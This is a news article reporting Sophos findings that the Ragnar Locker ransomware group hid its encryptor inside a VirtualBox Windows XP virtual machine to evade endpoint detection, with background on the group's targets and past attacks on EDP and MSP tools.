Ragnar Locker ransomware uses a clever trick to dodge detection. Read on to know more about it…
Ransomware attacks have become fairly common in recent times. Researchers discovered attack group that deployed highly targeted ransomware running inside virtualised Windows XP instance to evade detection. What makes this ransomware different from others is the fact that it uses virtual machines to dodge getting detected.
The RagnarLocker group is already known for carefully selecting targets, avoiding private users, and instead targeting corporate networks, managed service providers, and government organizations. Now, by adopting new innovative attack vectors, the RagnarLocker adversaries are taking their campaigns to a new level.
The gang behind Ragnar Locker go to such lengths because they target the high-value data of specific organisations and demand ransoms that run into the millions of dollars, according to security firm Sophos. “Like a lot criminals who conduct similar ‘targeted’ or ‘big game’ ransomware attacks, the Ragnar Locker gang try to avoid detection as they operate inside a victim’s network,” Sophos said in a statement.
UK based Cybersecurity firm Sophos Labs has detected a new attack wherein the Ragnar Locker ransomware was deployed inside an Oracle VirtualBox XP virtual machine. The attack payload was a 122 MB installer with a 282 MB virtual image inside that was used to conceal a 49 kB ransomware executable file.
“…Like a ghost able to interact with the material world, their [hackers that deploy Ragnar Locker ransomware] virtual machine is tailored per endpoint, so it can encrypt the local disks and mapped network drives on the physical machine, from within the virtual plane and out of the detection realm of most endpoint protection products,” Mark Loman, director of engineering, Threat Mitigation at Sophos said in a statement.
Ragnar Locker works in a tricky way. SophosLabs says that “In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server.”
Virtual machines are often used to execute malware in a sandboxed environment, but in this case the attackers reverse the situation, protecting their ransomware from malware scanners. “The Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” said Sophos director of engineering for threat mitigation Mark Loman in an advisory.
The MSI package included Sun xVM VirtualBox 3.0.4, released in August 2009, and a stripped-down WIndows XP SP3 image called MicroXP 0.82, which in turn contained the Ragnar Locker executable.
As the ransomware encrypts corporate files across the network, the process appears to be carried out by VirtualBox, a legitimate program. “Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviours can run unhindered, because they’re out of reach for security software on the physical host machine,” wrote Loman.
Ragnar Locker was first spotted in December 2019. Since then, there has been a common pattern visible in the attacks.
In April 2020, the actors behind Ragnar Locker attacked the network of the Portuguese multinational energy giant Energias de Portugal (EDP) and claimed to have stolen 10 TB of sensitive company data, demanding payment of 1,580 BTC and threatening to release the data if the ransom was not paid.
In February 2020, Ragnar Locker specifically targeted remote management software (RMM) commonly used by managed service providers (MSPs), such as the popular ConnectWise and Kaseya software to prevent their attack from being detected and stopped.